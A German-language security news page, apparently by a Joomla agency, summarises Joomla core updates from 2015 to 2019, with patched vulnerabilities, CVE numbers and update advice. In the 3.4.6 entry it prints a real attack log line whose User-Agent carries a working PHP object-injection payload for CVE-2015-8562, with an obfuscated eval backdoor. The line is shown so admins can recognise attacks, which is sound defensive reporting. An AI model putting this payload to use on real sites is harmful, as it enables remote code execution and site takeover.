Joomla Security News von Maximusweb

Joomla Security News von Maximusweb - Joomla Schutz vor Exploits,SQL-Injections,XSS-Cross-Site-Scripting, Remote File Inclusions,CSRF-Cross Site Request Forgerys, usw.

Joomla Security News von Maximusweb

Hier veröffentlichen wir regelmäßig Joomla Security News.

Das Content Management System (CMS)Joomla erfreut sich steigender Beliebtheit. Dieser Umstand bringt aber auch ungewollte Ereignisse mit sich. In den letzten Jahren haben sich die Angriffe und die Anzahl der Exploits für Joomla auf das Niveau von Wordpress eingependelt.

Benutzer welche noch Joomla Versionen 1 & 2 benutzen, rate ich dringend auf die aktuelle Version 3 umzusteigen. Die alten Versionen werden nur noch bei extremen Sicherheitslücken geupdated. Alle News die hier erscheinen werden, beziehen sich immer nur auf die aktuelle Version 3!

Video vom Joomla Day 2018, der das Thema Webseiten Sicherheit beleuchtet.

08.05.2019 Joomla Update 3.9.6

Heute ist eine neue Joomla Version erschienen: 3.9.6. Es wurde eine Sicherheitslücke geschlossen und viele kleine Fehler behoben. Hier die wichtigsten Änderungen:

Sicherheitslücken
  • In den Debug Ansichten von com_users wurde eine XSS Lücke beseitigt
Fehlerkorrekturen (bugfixes)
  • Korrektur eines Fehlers bei den Upload Checks aus 3.9.5 im Media Manager
  • Support für Edge Chromium hinzugefügt
  • Eine Beitragskategorie kann nun von Publishern und höher bearbeitet werden
  • Optimierung der PostgreSQL-Datenbank Unterstützung
  • u.v.m.

Die komplette Liste zum Download.

09.04.2019 Joomla Update 3.9.5

Kritische Sicherheitslücke

Heute wurde Joomla wieder einmal aktualisiert, auf Version 3.9.5. Auch dieses Update beinhaltet die Schließung von 3 Sicherheitslücken, eine davon ist "high priority" und diverse Fehlerkorrekturen (bugfixes):

Sicherheitslücken
  • Die Media Manager-Komponente kann den Ordnerparameter nicht ordnungsgemäß bereinigen, sodass Angreifer außerhalb des Media Manager-Stammverzeichnisses agieren können. (betrifft Joomla Joomla 1.5.0 bis 3.9.4) Niedrige Priorität
  • Dem Endpunkt "Liste der Hilfeseiten aktualisieren" von com_users fehlen Zugriffsprüfungen, sodass Anrufe von nicht authentifizierten Benutzern möglich sind. (betrifft Joomla 3.2.0 bis 3.9.4) Hohe Priorität!
  • Die $ .extend-Methode von JQuery ist anfällig für Angriffe von Object.prototype. (betrifft Joomla 3.0.0 bis 3.9.4) Niedrige Priorität
Fehlerkorrekturen (bugfixes)
  • Benutzerkennwort: Kleinbuchstabenpflicht für die Kennwortprüfung hinzugefügt
  • Registerkarte "Verknüpfungen": Fehlverhalten der indonesischen Sprache korrigiert
  • Sprachdebug: Korrektur des Benutzeraktionen-Protokoll-Managers
  • Neue Installationssprache: Kasachisch
  • Google Authenticator-Plugin (2FA): QR-Code-Generator implementiert
  • u.v.m.

Die komplette Liste zum Download.

13.03.2019 Joomla Update 3.9.4

Kritische Sicherheitslücke

Genau vor einem Monat erschien das letzte Sicherheitsupdate. Heute kam die neue Version 3.9.4 heraus. Auch dieses Update beinhaltet die Schließung von 4 Sicherheitslücken, eine davon ist "high priority" und diverse Fehlerkorrekturen (bugfixes):

Sicherheitslücken
  • Fehlerhafte ACL-Prüfung in den Beispieldaten-Plugins. (betrifft Joomla Joomla 3.8.0 bis 3.9.3) Hohe Priorität!
  • XSS Anfälligkeit im com_config JSON handler (betrifft Joomla 3.2.0 bis 3.9.0) Niedrige Priorität
  • XSS Anfälligkeit im media form field (betrifft Joomla 3.2.0 bis 3.9.0) Niedrige Priorität
  • XSS Anfälligkeit im item_title_layout (betrifft Joomla 3.2.0 bis 3.9.0) Niedrige Priorität
Fehlerkorrekturen (bugfixes)
  • Bei empfohlenen Artikel: Seitentitel hinzugefügt
  • Für die Custom-Fields wurden die Layout-Pfade vereinfacht
  • Action Logs: Es werden nun auch Cache und Export Aktionen mitgelogged
  • Im benutzerdefinierten Modul wurde die Bearbeitung im Frontend optimiert
  • u.v.m.

Die komplette Liste zum Download.

13.02.2019 Joomla Update 3.9.3

Kritische Sicherheitslücke

Joomla 3.9.3 ist erschienen und obwohl die geschlossenen Sicherheitslücken alle mit der Priorität "low" veröffentlicht wurden, empfehlen wir eine zeitnahes Update auf Joomla Version 3.9.3. Das Update beinhaltet die Schließung von 6 Sicherheitslücken und über 30 Fehlerkorrekturen (bugfixes):

Sicherheitslücken
  • Fehlende URL-Filterung in verschiedenen Kernkomponenten (Auswirkungen auf Joomla 2.5.0 bis 3.9.2) Niedrige Priorität
  • Auf der Browserseite verursachte XSS-Angriffsvektoren (die Joomla 1.0.0 bis 3.9.2 betreffen) Niedrige Priorität
  • Zusätzliche Warnung in den globalen Filtereinstellungen für globale Konfiguration (Auswirkungen auf Joomla 2.5.0 bis 3.9.2) Niedrige Priorität
  • Speichern von XSS Problem in der globalen Konfigurationshilfe-URL (betrifft Joomla 2.5.0 bis 3.9.2)
  • XSS-Problem in core.js writeDynaList (betrifft Joomla 2.5.0 bis 3.9.2) Niedrige Priorität
  • Implementierung des TYPO3 PHAR-Stream-Wrapper (der Joomla 2.5.0 bis 3.9.2 betrifft)
Fehlerkorrekturen (bugfixes)
  • Verhindern des Umbenennens / Löschens der Vorlage index.php-Datei
  • Verbesserung der intelligenten Suche
  • Verbesserung der Anzeige der Registerkarte "Integration"
  • Korrigierung der Kategoriefilter für vorgestellte Artikel
  • Korrektur für das Feld "Vorlagenstil" im Menü-Manager
  • u.v.m.

Die komplette Liste zum Download.

15.01.2019 Joomla Update 3.9.2

Kritische Sicherheitslücke

Gleich zu Anfang des Jahres 2019 haben die Joomla Entwickler ein großes Updatepaket geschnürt. Das Update beinhaltet die Schließung von 4 Sicherheitslücken und über 50 Fehlerkorrekturen (bugfixes):

Sicherheitslücken
  • Speichern von XSS in mod_banners (betrifft Joomla 2.5.0 bis 3.9.1) Niedrige Priorität
  • Speichern von XSS in com_contact (betrifft Joomla 2.5.0 bis 3.9.1) Niedrige Priorität
  • Speichern von XSS Problem in den globalen Einstellungen im bei Textfilter (betrifft Joomla 2.5.0 bis 3.9.1) Niedrige Priorität
  • Speichern von XSS Problem in den globalen Einstellungen für Hilfeseite (betrifft Joomla 2.5.0 bis 3.9.1)
Fehlerkorrekturen (bugfixes)
  • Beseitigung von Fehlern bei Status in com_finder, com_banners, com_messages und com_users
  • Behebung von Cachingproblemen bei languages, syndicate, random image und login Modulen
  • Editors API erweitert
  • Menüelement Alias-Typ: Umleitung als optional
  • com_media: Normalisierung der hochgeladenen Dateinamen
  • Code-Bereinigung und Namensraum
  • u.v.m.

Die komplette Liste zum Download.

27.11.2018 Joomla Update 3.9.1

Bereits einen Monat nach dem Release der Version 3.9.0 müssen die Joomla Entwickler ein weiteres Update nachreichen:

  • Ein Fehler im Zusammenhang mit PHP 5.3 wurde behoben. Sie sollten aktuell aber PHP Version 7.2 verwenden!
  • Diverse Performanceverbesserungen
  • Der TinyMCE Editor wurde auf Version 4.5.9 geupdated
  • Ein Fehler im Modulmanager sorgte dafür, dass die Modulposition nicht gelöscht werden konnte. Dies ist nun behoben

30.10.2018 Joomla Update 3.9.0

Die Joomla Entwickler haben heute eine neue Version veröffentlicht. Bei diesem Update wurde Joomla um bestimmte Funktionen erweitert:

  • Es können nun Benutzeraktivitäten protokolliert werden, sodaß Admins sehen, wer, wann, was und wo getan hat.
  • Stichwort:DSGVO. Joomla macht es Ihnen nun leichter, die DSGVO Regeln einzuhalten, wenn sich neue Benutzer registrieren.
  • Wenn ein User von seinem Auskunftsrecht Gebrauch machen will, können Sie dies nun per Knopfdruck im Backend veranlassen.

09.10.2018 Joomla Update 3.8.13

Die Version 3.8.13 wurde heute veröffentlicht und schließt ausschließlich Sicherheitslöcher.

Das Update schließt diverse minderschwere Lücken. Wir raten dazu, dieses Update zeitnah einzuspielen. Es gibt derzeit noch keine bekannten Exploits, welche die Lücken aktiv ausnutzen

  • Die Sicherheit des Joomla eigenen Kontaktformulares wurde verbessert (betrifft Joomla 2.5.0 - 3.8.12)
  • Der Access Level für Anmeldungen wurde erhöht (betrifft Joomla 2.5.4 - 3.8.12)
  • Verletzung der Zugriffsrechte in com_tags (betrifft Joomla 3.1.0 bis 3.8.12)
  • Verletzung der Zugriffsrechte bei der Admin Authentifizierung (betrifft Joomla 1.5.0 bis 3.8.12)
  • Verbesserter CSRF Schutz in com_installer (betrifft Joomla 2.5.0 bis 3.8.12))

28.08.2018 Joomla Update 3.8.12

Kritische Sicherheitslücke

Heute wurde wieder einmal eine neue Joomla Version veröffentlicht.

Das Update schließt 3 minderschwere Lücken. Wir raten dennoch, dieses Update zeitnah einzuspielen.Es gibt bereits Exploits, welche die Lücken aktiv ausnutzen:

  • Der Input-Filter für phar stubs wurde verbessert, betrifft Joomla Versionen von 1.5.0 bis 3.8.11
  • Im Frontend Profil wurde eine XSS-Lücke behoben, betrifft Joomla Versionen von 1.5.0 bis 3.8.11
  • ACL Prüfung verbessert - Unzureichende Prüfungen in Bezug auf deaktivierte Felder können zu einer ACL-Verletzung führen. Dies betrifft Joomla Versionen von 3.8.0 bis 3.8.11

14.12.2016 Joomla Update 3.6.5

Kritische Sicherheitslücke

Heute Nacht wurde eine neue Joomla Version veröffentlicht.

Wir raten dringend, dieses Update so schnell als möglich einzuspielen. Das Update behebt 1 gefährliche und 2 minderschwere Lücken. Es gibt bereits Exploits, welche die Lücke aktiv ausnutzen.

Die Exploits werden geführt unter CVE-2016-9838, CVE-2016-9836 und CVE-2016-9837 geführt. Mit der neuen Version wurde ebenso die Sicherheit verbessert. Betroffen sind alle Joomla Versionen von 1.6.0 bis 3.6.4!

25.10.2016 Joomla Update 3.6.4

Kritische Sicherheitslücke

Nachdem nun einige Joomla Updates nicht sicherheitsrelevant waren, haben die Joomla Entwickler heute am 25.10.2016 um 16:00 Uhr ein wichtiges Sicherheitsupdate herausgegeben.

Wir raten dringend dieses Update so schnell als möglich einzuspielen. Das Update behebt 2 gefährliche Lücken, durch welche sich ein Angreifer registrieren kann, obwohl die Registrierung deaktiviert ist. Mit der 2ten Lücke, kann sich dieser neu registrierte User, also der Angreifer, dann Admin Rechte geben.

Diese Angriffsmethode läuft auch ohne Patch ins Leere, wenn Sie Ihren Administrator Ordner per .htaccess Datei mit einem Passwort schützen. Die beiden Exploits werden geführt unter CVE-2016-8869 und CVE-2016-8870.

Betroffen sind alle Joomla Versionen von 3.4.4 bis 3.6.3!

29.12.2015 Joomla Update 3.4.8

Kurz vor Jahresende schieben die Joomla Entwickler noch schnell ein Update auf die Version 3.4.8 ein. Das Update behebt Probleme mit dem Session time-out, ein Datenbankproblem, sowie ein Problem beim Erstellen neuer Inhalte. Einer der Bugs (Fehler) kam wohl mit dem letzten Update.

Ich rate zeitnah auf die aktuelle Joomla Version 3.4.8 zu wechseln. Und damit allen ein schönes neues Jahr!

22.12.2015 Joomla Update 3.4.7

Kritische Sicherheitslücke

Eigentlich sollte mit dem Update auf die Version 3.4.6 die kritische Sicherheitslücke von letzter Woche geschlossen sein. Leider waren die geupdateten Webseiten immer noch angreifbar. Der Fehler lag diesmal bei PHP selbst. Folgende PHP Versionen sollen nicht von der Lücke betroffen sein: 5.4.45, 5.5.29, 5.6.13 und 7. Ich empfehle Webmastern Ihre PHP Version zu überprüfen und ggf. zu ändern.

Betroffen sind alle Joomla Versionen von 1.5 bis 3.4.6!

14.12.2015 Joomla Update 3.4.6

Kritische Sicherheitslücke

Mit dem Update auf die Version 3.4.6 haben die Joomla Entwickler wieder 3 Sicherheitslücken geschlossen. Eine Lücke gilt als besonders kritisch, da relativ einfach Administrationszugriff erlangt werden kann. Die Lücke wird unter der CVE-Nummer CVE-2015-8562 geführt. Die 2 anderen Sicherheitslücken betrafen die Benutzerverwaltung und stellen nur kleinere Schwachstellen dar.

Administratoren und Webmaster sollten nach folgenden Einträgen in den Logfiles suchen:

103.47.132.6 - - [15/Dec/2015:23:20:40 +0100] "GET / HTTP/1.1" 301 456 "http://maximusweb.org/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:102:\"eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST[s]))))));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"

Das ist ein Beispiel eines Logeintrags einer IP Adresse aus Indonesien. Diese und ähnliche Einträge habe ich auf 2 Projekten gefunden, diese Lücke wird also vermehrt ausgenutzt! Maximusweb Kunden sind sicher, da ich die Updates sehr zeitnah aufgespielt habe.

Betroffen sind alle Joomla Versionen von 1.5 bis 3.4.5!

Den Sicherheitspatch für die Joomla Versionen 1 und 2 bekommen Sie hier: https://docs.joomla.org

22.10.2015 Joomla Update 3.4.5

Kritische Sicherheitslücke

Mit dem Update auf die Version 3.4.5 haben die Joomla Entwickler 3 Sicherheitslücken geschlossen. Eine Lücke gilt als besonders kritisch, da per SQL-Injection Administrationszugriff erlangt werden kann. Die 2 anderen Sicherheitslücken betrafen die Benutzerverwaltung und wurden als kleine Schwachstelle bezeichnet. Die SQL-Injection wird unter den CVE Nummern CVE-2015-7297, CVE-2015-7857 und CVE-2015-7858 aufgeführt.

Ich empfehle dringend auf die aktuelle Version zu wechseln. Bitte machen Sie ein Backup, bevor Sie die aktuelle Version 3.4.5 aufspielen! Maximusweb Kunden brauchen sich keine Sorgen machen, da ich alle Sicherheitsupdates zeitnah einspiele.

Betroffen sind die Joomla Versionen 3.2.0 bis 3.4.4!